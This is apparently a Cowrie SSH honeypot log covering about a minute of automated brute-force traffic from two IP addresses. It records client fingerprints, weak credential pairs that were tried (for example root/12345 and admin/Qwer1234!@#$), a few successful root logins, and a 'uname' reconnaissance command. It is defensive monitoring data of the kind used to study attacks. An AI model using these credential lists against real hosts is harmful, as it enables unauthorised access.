{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:14:49.232735Z","src_ip":"212.227.125.160","session":"953f8a9adbad"}
{"eventid":"cowrie.login.failed","username":"server","password":"letmein","message":"login attempt [server/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T05:14:51.412683Z","src_ip":"212.227.125.160","session":"953f8a9adbad"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:14:52.755675Z","src_ip":"212.227.125.160","session":"953f8a9adbad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49526,"dst_ip":"1.2.3.4","dst_port":22,"session":"795964b69680","protocol":"ssh","message":"New connection: 212.227.235.229:49526 (1.2.3.4:22) [session: 795964b69680]","sensor":"my-vps","timestamp":"2025-08-31T05:14:53.989214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:14:53.995055Z","src_ip":"212.227.235.229","session":"795964b69680"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:14:54.248426Z","src_ip":"212.227.235.229","session":"795964b69680"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1","message":"login attempt [postgres/1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:14:55.272345Z","src_ip":"212.227.235.229","session":"795964b69680"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:14:56.534101Z","src_ip":"212.227.235.229","session":"795964b69680"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60216,"dst_ip":"1.2.3.4","dst_port":22,"session":"de8b430e887a","protocol":"ssh","message":"New connection: 212.227.235.229:60216 (1.2.3.4:22) [session: de8b430e887a]","sensor":"my-vps","timestamp":"2025-08-31T05:14:58.635486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:14:58.636385Z","src_ip":"212.227.235.229","session":"de8b430e887a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:14:58.728119Z","src_ip":"212.227.235.229","session":"de8b430e887a"}
{"eventid":"cowrie.login.failed","username":"sas","password":"sas","message":"login attempt [sas/sas] failed","sensor":"my-vps","timestamp":"2025-08-31T05:14:59.137959Z","src_ip":"212.227.235.229","session":"de8b430e887a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:15:00.233169Z","src_ip":"212.227.235.229","session":"de8b430e887a"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:15:05.446156Z","src_ip":"212.227.235.229","session":"26feabc53f8d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:15:17.450877Z","src_ip":"212.227.235.229","session":"26feabc53f8d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:15:17.451745Z","src_ip":"212.227.235.229","session":"26feabc53f8d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"4.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:15:21.837232Z","src_ip":"212.227.235.229","session":"26feabc53f8d"}
{"eventid":"cowrie.session.closed","duration":"40.7","message":"Connection lost after 40.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:15:21.906949Z","src_ip":"212.227.235.229","session":"26feabc53f8d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45326,"dst_ip":"1.2.3.4","dst_port":22,"session":"03d17f803861","protocol":"ssh","message":"New connection: 212.227.125.160:45326 (1.2.3.4:22) [session: 03d17f803861]","sensor":"my-vps","timestamp":"2025-08-31T05:15:24.083410Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58212,"dst_ip":"1.2.3.4","dst_port":22,"session":"091631b233db","protocol":"ssh","message":"New connection: 212.227.235.229:58212 (1.2.3.4:22) [session: 091631b233db]","sensor":"my-vps","timestamp":"2025-08-31T05:15:25.648320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:15:26.370908Z","src_ip":"212.227.235.229","session":"091631b233db"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:15:26.371573Z","src_ip":"212.227.235.229","session":"091631b233db"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:15:29.388552Z","src_ip":"212.227.125.160","session":"03d17f803861"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:15:29.389272Z","src_ip":"212.227.125.160","session":"03d17f803861"}
{"eventid":"cowrie.login.failed","username":"server","password":"welcome","message":"login attempt [server/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T05:15:31.898629Z","src_ip":"212.227.235.229","session":"091631b233db"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:15:33.623454Z","src_ip":"212.227.235.229","session":"091631b233db"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:15:37.232654Z","src_ip":"212.227.125.160","session":"03d17f803861"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:15:39.965979Z","src_ip":"212.227.125.160","session":"03d17f803861"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:15:39.966689Z","src_ip":"212.227.125.160","session":"03d17f803861"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:15:41.322327Z","src_ip":"212.227.125.160","session":"03d17f803861"}
{"eventid":"cowrie.session.closed","duration":"17.2","message":"Connection lost after 17.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:15:41.323522Z","src_ip":"212.227.125.160","session":"03d17f803861"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60590,"dst_ip":"1.2.3.4","dst_port":22,"session":"61a96df2e4ac","protocol":"ssh","message":"New connection: 212.227.235.229:60590 (1.2.3.4:22) [session: 61a96df2e4ac]","sensor":"my-vps","timestamp":"2025-08-31T05:15:43.375892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:15:45.670492Z","src_ip":"212.227.235.229","session":"61a96df2e4ac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:15:45.671394Z","src_ip":"212.227.235.229","session":"61a96df2e4ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63157,"dst_ip":"1.2.3.4","dst_port":22,"session":"80f6bcc7d98a","protocol":"ssh","message":"New connection: 212.227.235.229:63157 (1.2.3.4:22) [session: 80f6bcc7d98a]","sensor":"my-vps","timestamp":"2025-08-31T05:15:45.751276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T05:15:45.752228Z","src_ip":"212.227.235.229","session":"80f6bcc7d98a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T05:15:45.881084Z","src_ip":"212.227.235.229","session":"80f6bcc7d98a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48890,"dst_ip":"1.2.3.4","dst_port":22,"session":"075809f0fc67","protocol":"ssh","message":"New connection: 212.227.125.160:48890 (1.2.3.4:22) [session: 075809f0fc67]","sensor":"my-vps","timestamp":"2025-08-31T05:15:46.279239Z"}
{"eventid":"cowrie.login.failed","username":"solomon","password":"solomon","message":"login attempt [solomon/solomon] failed","sensor":"my-vps","timestamp":"2025-08-31T05:15:46.480004Z","src_ip":"212.227.235.229","session":"80f6bcc7d98a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:15:46.677703Z","src_ip":"212.227.125.160","session":"075809f0fc67"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:15:46.678370Z","src_ip":"212.227.125.160","session":"075809f0fc67"}
{"eventid":"cowrie.login.failed","username":"solomon","password":"solomon1","message":"login attempt [solomon/solomon1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:15:47.610298Z","src_ip":"212.227.235.229","session":"80f6bcc7d98a"}
{"eventid":"cowrie.login.failed","username":"server","password":"welcome","message":"login attempt [server/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T05:15:48.344311Z","src_ip":"212.227.125.160","session":"075809f0fc67"}
{"eventid":"cowrie.login.failed","username":"solomon","password":"solomon123","message":"login attempt [solomon/solomon123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:15:48.741135Z","src_ip":"212.227.235.229","session":"80f6bcc7d98a"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:15:49.784045Z","src_ip":"212.227.125.160","session":"075809f0fc67"}
{"eventid":"cowrie.login.failed","username":"solomon","password":"solomon1234","message":"login attempt [solomon/solomon1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:15:49.871379Z","src_ip":"212.227.235.229","session":"80f6bcc7d98a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53760,"dst_ip":"1.2.3.4","dst_port":22,"session":"c715db074631","protocol":"ssh","message":"New connection: 212.227.235.229:53760 (1.2.3.4:22) [session: c715db074631]","sensor":"my-vps","timestamp":"2025-08-31T05:15:50.930941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:15:50.931986Z","src_ip":"212.227.235.229","session":"c715db074631"}
{"eventid":"cowrie.login.failed","username":"solomon","password":"solomon12345","message":"login attempt [solomon/solomon12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:15:51.002630Z","src_ip":"212.227.235.229","session":"80f6bcc7d98a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:15:51.204819Z","src_ip":"212.227.235.229","session":"c715db074631"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:15:52.133065Z","src_ip":"212.227.235.229","session":"80f6bcc7d98a"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:15:52.311299Z","src_ip":"212.227.235.229","session":"61a96df2e4ac"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Qwer1234!@#$","message":"login attempt [admin/Qwer1234!@#$] failed","sensor":"my-vps","timestamp":"2025-08-31T05:15:52.338219Z","src_ip":"212.227.235.229","session":"c715db074631"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:15:53.613266Z","src_ip":"212.227.235.229","session":"c715db074631"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:15:53.956149Z","src_ip":"212.227.235.229","session":"61a96df2e4ac"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:15:53.956887Z","src_ip":"212.227.235.229","session":"61a96df2e4ac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:15:55.323437Z","src_ip":"212.227.235.229","session":"61a96df2e4ac"}
{"eventid":"cowrie.session.closed","duration":"11.9","message":"Connection lost after 11.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:15:55.324617Z","src_ip":"212.227.235.229","session":"61a96df2e4ac"}
